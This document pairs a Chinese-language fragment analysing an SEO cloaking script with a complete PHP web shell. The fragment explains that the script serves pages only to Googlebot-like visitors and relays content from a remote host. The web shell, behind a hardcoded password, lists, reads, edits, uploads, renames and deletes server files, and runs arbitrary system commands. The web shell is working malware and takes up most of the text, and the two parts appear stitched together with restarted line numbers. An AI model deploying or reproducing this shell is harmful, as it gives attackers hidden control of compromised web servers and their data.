身份伪造 (Bypass 403/404):
16
如果你的 User-Agent 不是搜索引擎爬虫，或者 Referer 不包含搜索引擎的域名，脚本大概率会执行 goto fV5Np 或 goto i7Kcc，返回 403 Forbidden 或 404 Not Found。
17
含义: 要触发深层逻辑，你需要伪造 HTTP 头。将 User-Agent 修改为 Googlebot，或者将 Referer 设置为 https://www.google.com。
18
敏感文件操作:
19
脚本会检测本地是否存在 tlc.txt。如果不存在，它会创建并将 $vvypT 设为 0。它还会动态生成或修改 robots.txt 和包含 sitemap.xml 的内容。
20
SSRF/远程请求 (进阶利用):
21
当满足特定条件时（伪装成搜索引擎爬虫访问特定页面），脚本会拼接你的 IP、URI、UA 等信息，利用 curl 或 file_get_contents 向远端 http://cw4471.artistsaw.com/ 发起请求，并将获取到的内容回显给访问者。

1
?><?php
2
error_reporting(0);
3
session_start();
4

5
// Password: memek123
6
$pass = "memek123";
7

8
// Cek login
9
if(isset($_GET['password'])) {
10
    if($_GET['password'] === $pass) {
11
        $_SESSION['login'] = true;
12
    }
13
}
14

15
// Jika belum login
16
if(!isset($_SESSION['login']) || $_SESSION['login'] !== true) {
17
    echo ' ';
18
    exit();
19
}
20

21
// WEBSHELL START
22
echo "<!DOCTYPE html>
23
<html>
24
<head>
25
    <title></title>
26
    <style>
27
        body { font-family: monospace; background-color: #f9f9f9; padding: 20px; }
28
        pre { font-size: 14px; }
29
        .cmd-section { margin-top: 20px; }
30
        .cmd-form { display: flex; gap: 10px; align-items: center; margin-bottom: 10px; }
31
        .cmd-form input[type='text'] { flex: 1; padding: 5px; font-family: monospace; font-size: 14px; }
32
        .cmd-form input[type='submit'] { padding: 5px 10px; }
33
        textarea { width: 100%; height: 200px; font-family: monospace; font-size: 14px; }
34
        a { text-decoration: none; color: #0645AD; }
35
        a.visited { color: #b58900 !important; font-weight: bold; }
36
        .logout { float: right; color: #e74c3c; font-weight: bold; }
37
    </style>
38
    <script>
39
        document.addEventListener('DOMContentLoaded', function() {
40
            document.querySelectorAll('a').forEach(function(link) {
41
                if(localStorage.getItem(link.href)) {
42
                    link.classList.add('visited');
43
                }
44
                link.addEventListener('click', function() {
45
                    localStorage.setItem(link.href, '1');
46
                });
47
            });
48
        });
49
    </script>
50
</head>
51
<body>
52
<a class='logout' href='?logout=1'>Logout</a><pre>";
53

54
// Handle logout
55
if(isset($_GET['logout'])) {
56
    session_destroy();
57
    header('Location: ' . $_SERVER['PHP_SELF']);
58
    exit();
59
}
60

61
$cwd = realpath($_GET['path'] ?? getcwd());
62
if(!$cwd || !file_exists($cwd)) $cwd = getcwd();
63

64
// Handle delete
65
if(isset($_GET['del'])) {
66
    $target = realpath($_GET['del']);
67
    if(is_file($target)) {
68
        echo unlink($target) ? "[+] File deleted: $target\n" : "[-] Failed to delete file\n";
69
    } elseif(is_dir($target)) {
70
        echo rmdir($target) ? "[+] Directory deleted: $target\n" : "[-] Failed to delete directory\n";
71
    }
72
}
73

74
// Handle rename
75
if(isset($_GET['rename'], $_POST['newname'])) {
76
    $old = realpath($_GET['rename']);
77
    $new = dirname($old) . '/' . basename($_POST['newname']);
78
    echo rename($old, $new) ? "[+] Renamed to: $new\n" : "[-] Rename failed\n";
79
}
80

81
// Handle file save
82
if(isset($_GET['edit'], $_POST['content'])) {
83
    $file = $cwd . '/' . basename($_GET['edit']);
84
    echo file_put_contents($file, $_POST['content']) !== false ? "[+] File saved: $file\n" : "[-] Save failed\n";
85
}
86

87
// Handle file upload
88
if(isset($_POST["upload"]) && isset($_FILES["up"])) {
89
    $up = $_FILES["up"];
90
    $dest = $cwd . "/" . basename($up["name"]);
91
    echo move_uploaded_file($up["tmp_name"], $dest) ? "[+] Uploaded: " . $up["name"] . "\n" : "[-] Upload failed\n";
92
}
93

94
// Breadcrumb
95
echo "<b>Current Dir:</b> ";
96
$parts = explode("/", trim($cwd, "/"));
97
$build = "";
98
echo "<a href='?path=/'>/</a>";
99
foreach($parts as $part) {
100
    $build .= "/" . $part;
101
    echo "<a href='?path=" . urlencode($build) . "'>$part</a>/";
102
}
103
echo "\n\n";
104

105
// Directory listing
106
$files = scandir($cwd);
107
natcasesort($files);
108

109
$dirs = [];
110
$regularFiles = [];
111

112
foreach($files as $f) {
113
    if($f === "." || $f === "..") continue;
114
    $full = $cwd . '/' . $f;
115
    is_dir($full) ? $dirs[] = $f : $regularFiles[] = $f;
116
}
117

118
// Show directories
119
foreach($dirs as $f) {
120
    $full = $cwd . '/' . $f;
121
    echo "[DIR]  <a href='?path=" . urlencode($full) . "'>$f</a> ";
122
    echo "[ <a href='?del=" . urlencode($full) . "'>delete</a> | ";
123
    echo "<a href='?rename=" . urlencode($full) . "'>rename</a> ]\n";
124
}
125

126
// Show files
127
foreach($regularFiles as $f) {
128
    $full = $cwd . '/' . $f;
129
    echo "[FILE] <a href='?path=" . urlencode($cwd) . "&read=" . urlencode($f) . "'>$f</a> ";
130
    echo "[ <a href='?path=" . urlencode($cwd) . "&edit=" . urlencode($f) . "'>edit</a> | ";
131
    echo "<a href='?del=" . urlencode($full) . "'>delete</a> | ";
132
    echo "<a href='?rename=" . urlencode($full) . "'>rename</a> ]\n";
133
}
134

135
// File viewer
136
if(isset($_GET['read'])) {
137
    $target = realpath($cwd . '/' . $_GET['read']);
138
    if($target && is_file($target)) {
139
        echo "\n<b>Viewing:</b> " . htmlspecialchars($target) . "\n\n";
140
        echo htmlspecialchars(file_get_contents($target));
141
    }
142
}
143

144
// Edit form
145
if(isset($_GET['edit']) && !isset($_POST['content'])) {
146
    $file = $cwd . '/' . basename($_GET['edit']);
147
    $content = htmlspecialchars(@file_get_contents($file));
148
    echo "<form method='POST'>
149
    <textarea name='content'>$content</textarea><br>
150
    <input type='submit' value='Save'>
151
    </form>";
152
}
153

154
// Rename form
155
if(isset($_GET['rename']) && !isset($_POST['newname'])) {
156
    echo "<form method='POST'>
157
    Rename to: <input type='text' name='newname'>
158
    <input type='text' name='cmd'>
159
    <input type='submit' value='Exec'>
160
</form>";
161

162
if(!empty($_POST["cmd"])) {
163
    echo "<div>
164
        <b>CMD Output:</b><br>
165
        <textarea readonly>";
166
    system($_POST["cmd"]);
167
    echo "</textarea></div>";
168
}
169

170
echo "</div></pre></body></html>";
171
?>